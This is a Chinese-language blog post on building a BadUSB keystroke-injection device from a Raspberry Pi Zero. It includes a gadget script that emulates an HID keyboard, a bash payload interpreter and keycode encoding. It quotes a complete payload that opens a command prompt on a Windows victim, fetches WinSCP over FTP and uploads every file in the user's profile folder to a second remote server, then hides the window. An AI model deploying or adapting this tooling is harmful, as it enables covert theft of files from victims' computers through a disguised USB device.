基于树莓派的多功能USB实现--BadUSB模式
此文首先发表于微信公众号。具体详情请移步公众号查看:WriteSimpleDemo
Github
https://github.com/pedroqin/RaspberryPi-based-multi-functional-USB-Device
Badusb介绍
BadUSB is a dangerous USB security flaw that allows attackers to turn a simple USB device into a keyboard, which can then be used to type malicious commands into the victim’s computer.
在钢铁侠1中 1:31:09 处有关于Badusb的演示。。。
方案选择
- 在树莓派Zero上已经有比较完整的实现Badusb方案:P4wnP1
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).
该方案不支持最新的debian10,而且由于其集成了很多功能,与目前多功能USB其他部分设置存在冲突,故舍弃。
- 在寻求其他方案过程中发现另一个开源工具: hardpass-passwordmanager(A Raspberry Pi Zero based WiFi Enabled Hardware Password Manager, now with a PCB),这个硬件密码管理器实现了 虚拟ID键盘和HID键盘输入解析,这部分正好可以给Badusb使用。剩下的部分就是编写Payload解释器脚本
Payload在本文可以简单理解为实现Badusb单个功能(如Windows解锁,调用cmd窗口运行命令)的流程脚本。
实现
本文采用第二种方案。该实现需要三部分:模拟HID键盘, Payload解释器和内容输入
模拟HID键盘
- 初始环境设置
# Enable dwc2 on the Pi
echo "dtoverlay=dwc2" | sudo tee -a /boot/config.txt
# Enable dwc2 initialisation
echo "dwc2" | sudo tee -a /etc/modules
echo "libcomposite" | sudo tee -a /etc/modules
- 实际应用中,已将以下脚本注册成服务,需要时
enable对应服务并重启即可。
#!/bin/bash
# Initial Setup
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
# Device description
echo 0x1d6b > idVendor # Linux Foundation
echo 0x0104 > idProduct # Multifunction Composite Gadget
echo 0x0100 > bcdDevice # v1.0.0
echo 0x0200 > bcdUSB # USB2
mkdir -p strings/0x409
echo "abcdef1234567890" > strings/0x409/serialnumber
echo "Pedro Qin" > strings/0x409/manufacturer
echo "raspberry USB device" > strings/0x409/product
# Define a Keyboard
mkdir -p functions/hid.usb0
echo 1 > functions/hid.usb0/protocol
echo 1 > functions/hid.usb0/subclass
echo 8 > functions/hid.usb0/report_length
echo -ne \\x05\\x01\\x09\\x06\\xa1\\x01\\x05\\x07\\x19\\xe0\\x29\\xe7\\x15\\x00\\x25\\x01\\x75\\x01\\x95\\x08\\x81\\x02\\x95\\x01\\x75\\x08\\x81\\x03\\x95\\x05\\x75\\x01\\x05\\x08\\x19\\x01\\x29\\x05\\x91\\x02\\x95\\x01\\x75\\x03\\x91\\x03\\x95\\x06\\x75\\x08\\x15\\x00\\x25\\x65\\x05\\x07\\x19\\x00\\x29\\x65\\x81\\x00\\xc0 > functions/hid.usb0/report_desc
mkdir -p configs/c.1/strings/0x409
ln -s functions/hid.usb0 configs/c.1/
echo "Config 1: Keyboard" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
ls /sys/class/udc > UDC
# for status check
touch /tmp/enable_hid.lock
- 实现效果如下:
模拟Payload解释器
以下是一个叫Payload ftp download upload的Payload:
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
STRING ftp -i SERVER
ENTER
DELAY 800
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET WinSCP.com
ENTER
DELAY 200
STRING GET WinSCP.exe
ENTER
DELAY 3000
STRING quit
ENTER
REM FTP user only needs write access.
STRING WinSCP.com /command "option batch abort" "option confirm off" "open ftp://USERNAME2:PASSWORD2@SERVER2" "put *.*" "close" "exit"
ENTER
ALT SPACE
STRING N
根据此Payload 脚本,可简单模拟解释器,主要逻辑如下:
......
echo "$@" | while read line;do
case ${line:0:3} in
# ctrl
CON)
prefix="\x1"
press_one_key "$prefix" "${line#* }"
;;
# alt
ALT)
prefix="\x4"
press_one_key "$prefix" "${line#* }"
;;
# shift
SHI)
prefix="\x2"
press_one_key "$prefix" "${line#* }"
;;
# windows
GUI)
prefix="\x08"
press_one_key "$prefix" "${line#* }"
;;
# comments
REM)
continue
;;
# input str
STR)
input_string "${line#* }"
;;
# enter
ENT)
press_enter
;;
# delay
DEL)
sleep "${line#* }"
;;
EXI)
return
;;
*)
input_string "${line}"
;;
esac
done
......
内容输入
HID键盘协议:ID Usage Tables 1.12 :10 Keyboard/Keypad Page (0x07)
实现字符串输入需要将目标内容解析成HID keycode,然后由HID键盘转回目标内容。
具体有以下两种方案,在实际测试时,需两种方案结合,scan完成符串输入和脚本实现控制字串(如ctrl r等)输入
1. 脚本实现
USB键盘数据包含8个字节:
BYTE1 -- 特殊按键
|--bit0: Left Control 是否按下,按下为1
|--bit1: Left Shift 是否按下,按下为1
|--bit2: Left Alt 是否按下,按下为1
|--bit3: Left GUI(Windows键) 是否按下,按下为1
|--bit4: Right Control 是否按下,按下为1
|--bit5: Right Shift 是否按下,按下为1
|--bit6: Right Alt 是否按下,按下为1
|--bit7: Right GUI 是否按下,按下为1
BYTE2 -- 0
BYTE3-BYTE8 当前按下的普通按键键值,最多六个按键
每次输入完后需输入8个0字节结束输入。
示例,输入“A”:
echo -ne "\x2\0\x04\0\0\0\0\0" > /dev/hidg0
sleep 0.1
echo -ne "\0\0\0\0\0\0\0\0" > /dev/hidg0
依此逻辑可以完成键盘模拟输入。但需要注意输入时增加延时。
缺点:效率低,有部分字母显示不正常
2. 引用hardpass-passwordmanager内工具
root@raspberrypi:/tmp# git clone https://github.com/girst/hardpass-passwordmanager
Cloning into 'hardpass-passwordmanager'...
remote: Enumerating objects: 446, done.
remote: Total 446 (delta 0), reused 0 (delta 0), pack-reused 446
Receiving objects: 100% (446/446), 2.00 MiB | 66.00 KiB/s, done.
Resolving deltas: 100% (263/263), done.
Checking out files: 100% (165/165), done.
root@raspberrypi:/tmp# cd hardpass-passwordmanager/send_hid/
root@raspberrypi:/tmp/hardpass-passwordmanager/send_hid# ls
LICENSE Makefile README.md hardpass-demo.sh main.c scan scancodes.c scancodes.h
root@raspberrypi:/tmp/hardpass-passwordmanager/send_hid# make
gcc -std=c99 -Wall -Werror main.c scancodes.c -o scan
编译生成的scan工具可以完成字符串的输入
缺点:只能实现字符串输入,无法实现控制字符串如GUI r等操作(可通过改源码实现)
演示
视频中演示了payload脚本模式和与AP模式结合时远程控制
视频2
附录
Payload
Well, a payload can be considered to be somewhat similar to a virus. A payload is a set of malicious codes that carry crucial information that can be used to hack any device beyond limits that you can’t imagine. … Generally, a payload refers to a set of codes which a hacker designs according to his/her requirements.
参考链接
what is payload in hacking(https://www.cybrary.it/0p3n/payload-the-hacking-beyond-imagination/)
Payloads(https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads)
hardpass-passwordmanager(https://github.com/girst/hardpass-passwordmanager)
pi-as-keyboard(https://github.com/c4software/pi-as-keyboard)
HID Usage Tables 1.12(https://usb.org/sites/default/files/documents/hut1_12v2.pdf)